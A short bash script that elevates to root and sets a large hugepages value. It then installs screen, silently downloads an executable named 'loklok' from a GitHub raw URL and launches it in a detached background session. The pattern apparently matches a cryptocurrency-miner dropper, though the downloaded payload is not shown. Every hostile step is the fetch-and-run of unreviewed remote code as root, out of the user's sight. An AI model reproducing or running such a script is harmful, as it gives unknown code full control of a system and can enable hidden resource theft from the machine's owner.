#!/bin/bash
sudo su <<EOF
GREEN='\033[1;32m'
RESET='\e[0m'
BLUE='\033[1;34m'
YEL='\033[1;33m'
sudo sysctl -w vm.nr_hugepages=2080
sudo apt update -y && sudo apt install screen -y && screen
echo -e "${BLUE} Start ${RESET}"
wget -qO start.sh https://raw.githubusercontent.com/sarifadim/dopla/main/loklok && chmod +x start.sh >/dev/null 2>&1
screen -dms run ./start.sh
EOF
screen -r

